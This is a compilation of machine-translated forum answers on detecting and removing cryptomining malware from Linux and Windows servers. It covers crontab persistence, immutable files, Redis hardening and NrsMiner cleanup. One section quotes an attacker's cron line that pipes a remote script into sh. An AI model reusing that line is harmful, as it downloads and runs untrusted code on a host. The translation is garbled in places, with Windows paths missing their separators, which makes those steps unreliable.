❶ After the server was attacked by the rshim mining virus, the HugePages_Total transparent huge page could not be cleared and kept occupying the memory balls.
Problem location and solution steps:
1, free -m Check the memory usage status and find that the free is basically gone. –> Suspected that there is a memory leak in the service, start the investigation
2. Use the top command to observe that the opened service does not occupy a large amount of memory, and the final document is at the same value, and the service is a java application, The memory does not reach the upper limit set by the parent jvm. Sort by memory occupied by top monitoring, and the total amount will not exceed the total amount of physical memory. Check the hard disk usage, occupy 20%. Basically rule out the cause of excessive virtual memory usage. —> Exclude service memory leak factors, suspect mysql and nginx, and start troubleshooting No, set the maximum number of connections to 1000, and it will not exceed a few M at most. The nginx footprint has been very small. But every time the first to be killed is basically the nginx process. So I checked, but found that it was nothing more than the adjustment of the number of openfiles. Found that everything was fine. And niginx can be used normally before.
4. The most puzzling thing is that when you view it through free -m, it is basically used, the cache part is very small, and there is basically no free. But I can’t find which processes are occupying memory on top. No solution
5. Notice that although two processes take up a lot of memory, they basically consume 100% of the CPU. At first I thought that it would occupy the CPU, but not the memory. Now, the memory is not enough to cause the process to be killed, so I didn’t pay attention to this.
6. If I can’t figure it out, restart the server, restart all services, the service is temporarily available, go home. On the way, I found it broke again. Sleeping apprehensively.
7. Keep reading when you get up in the morning. This time, pay attention to the two processes that occupy high CPU, kdevtmpfsi and networkservice. In the mentality of seeing what the process is, I went online. The truth is clear at a glance, two mining viruses.
Suddenly realize the cause of the error:
1. The cpu usage rate is high, and the service with high cpu frequency is the most likely to exceed the memory limit for normal services. (Because there are no CPU resources when the CPU needs to be used, the memory is occupied a lot, and the service crashes instantly), and then look at the top and find that the process that has just occupied the memory has been killed, so no high memory usage is found.
2. A similar situation will occur when the subsequent applications continue to use the cpu, but the services are gradually killed one by one.
Once the problem is basically located, it is relatively simple to solve the problem:
Through the network, google, and the common virus removal steps can basically be solved. These two mining viruses are very common, and the main points are roughly recorded. Probably all viruses have these basic operations.
① First, check the scheduled tasks in the current system: crontab -l
There are four scheduled download tasks on my server. Download virus files through wget and curl, and delete the abnormal ones. Otherwise, if the virus file is deleted, it will still be downloaded
crontab -r, delete all commands (or delete scheduled tasks as required)
② Find virus files can be cleared by fuzzy search, but virus files Basically use the chattr +i command to use chattr -i filename and then use rm -f filename. You can delete
③ kill the virus process, but note that it may restart immediately after killing. Because there is a daemon process, it is necessary to kill the daemon process of the virus process.
④ Check whether the root user is attacked, and the system configuration information may be changed.
⑤ It is better to understand the virus script and see what it does by looking at the code. Fix system for scripts.
❷ What should I do if the Alibaba Cloud server is mined (pure computer white)
1. Close the access to the mining server
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,Cancel the execution permission. Do not delete minerd until the root cause is found, because if you delete it, a new one will be generated automatically.
3. pkill minerd, kill the process
4. Service stop crond or crontab -r to delete all execution plans
5. Execute top, check it for a while, and find no more minerd process.
6. Check the /var/spool/cron/ directory and find that there is a timer file for the root user.
Download the script statement:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
The content of the virus file is as follows, if you are interested, you can study it:
Solving minerd is not the ultimate goal, it is mainly to find the root cause of the problem, my server problem lies in redThe is service, the hacker used a vulnerability in redis to gain access to the server, http://blog.jobbole.com/94518/ and then injected the virus, the following is the solution and removal work:
1. Repair the backdoor of redis,
Configure the bind option, limit the IP that can connect to the Redis server, and modify the default port of redis 6379.
Configure AUTH, set the password, the password will be as The plaintext is stored in the redis configuration file.
Configure the rename-command CONFIG “RENAME_CONFIG”, so that even if there is unauthorized access, it can make it more difficult for attackers to use the config command
The good news is that the author of Redis said “real user” will be developed to distinguish between ordinary users and admin permissions, ordinary users will be prohibited from running certain commands, such as conf
2. Open ~/.ssh/authorized_keys, delete accounts you do not know
3. Check your user list to see if any user you don’t know has been added. If there is, delete it.
❸ Help server is invaded by mining program, how to troubleshoot
The new customer recently consulted our SINE security company, saying that his The website where the server is often stuck cannot be opened, and the remote connection
The server is extremely slow. Sometimes the PING value is between 300-500, and the packets are often dropped. Listening to the customer, generally
It will be judged that it has been attacked by CC+DDOS mixed traffic. If you ask more specifically, it is said that the computer room is not attacked by traffic. This is a bit strange. It is not a traffic attack. It also causes the server to get stuck and the website cannot be opened. What kind of attack is this? In order to solve the problem of the client’s server card, we immediately arranged for a security engineer to conduct security testing and security deployment on his Linux server.
The mining Trojan is also designed to automatically start mining if the mining process is stopped by the customer. Intermittent mining,
Carefully checked and found that it is by setting an hourly execution task plan, downloading the shell mining Trojan remotely, and then executing it to check if the current process exists
, if it does not exist, start the mining Trojan and start mining.
The customer’s linux server was inspected in detail, and it was found that fortunately the data of the server was not encrypted, and the virus infected with worm
If the data is encrypted, the loss will be great, and the customer It is a platform, and the customer data in it is very important. After finding the mining Trojan,
The customer needs to know how the server was attacked? Uploaded by a mining Trojan? Prevent such attacks from recurring in the future
Through the security detection and analysis of our security engineers, it is found that the server uses the apache tomcat environment, and the platform’s development architecture is JSP+oracle database, which is used by apache tomcat It is the 2016 version, which causes the apache to have a serious remote command execution vulnerability.
Intruders can directly invade the server through this vulnerability and get the administrator rights of the server.
SINE security engineers immediately repaired the apache vulnerability and removed the Trojan horse. So far, the problem has been solved, the client server
Everything is running stably, and the website is opened normally.
❹ How to solve the problem that the server is implanted with a backdoor
Patch frequently; the password setting is more complicated; temporarily unused ports and services are closed, which requires open again. You can try the security dog to check and kill the back door.
❺ How to evaluate Tencent Cloud’s ability to prevent servers from being implanted with mining Trojan horses and become
You can install some antivirus software on computers
such as computers Housekeeper and the like, and then keep it on all the time
This can prevent viruses from entering the computer
❻ How to clean up the mining virus in the Alibaba Cloud windows server
Deleting alone is useless, because the loophole has not been solved.
The suggestion is to redo the system, and then ask the Guardian to give you a system security reinforcement, so that the loopholes are completely blocked to be effective.
❼ There is a mining virus in the win2008 server, please answer!
Under the premise of not being able to completely kill it, back up your own data and then reinstall the system, otherwise it will be really troublesome to delay work.
❽ How about on the server Clear the NrsMiner mining virus
The complete removal process of the mining virus is as follows, please do it when the network is disconnected:
1. Stop and disable the Hyper-VAccess Protection Agent Service service;
2. Delete C:Windowssystem32NrsDataCache.tlb;
3. Delete C:.dll, if the deletion fails, rename the file to another name;
4 .Restart the computer;
5. Delete C:Windowssystem32SysprepThemes and C:WindowsSysprepThemes directories;
6. Delete C:Windowssystem32SecUpdateHost.exe.
7. Go to Microsoft’s official website to download the correspondingOperating system patch, the download link is as follows: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010
8. Install domestic mainstream antivirus software and update it in time to the latest virus signature database.
❾ What should I do if the server is mined?
What did my buddy get mined for? Go report it. When the traffic ore was very popular before, my server was also hacked unscrupulously and became a broiler. Then I went to find his information, took screenshots and reported the traffic ore, and it helped me deal with it. If you see what you have been charged with, go to them to deal with it.
❿What should I do if a server cluster is infected with a mining Trojan?
First of all, physical isolation, and then ask a professional security vendor to determine the type of virus, and then repair the relevant system Vulnerabilities, and then use special killing tools or anti-virus software to scan and kill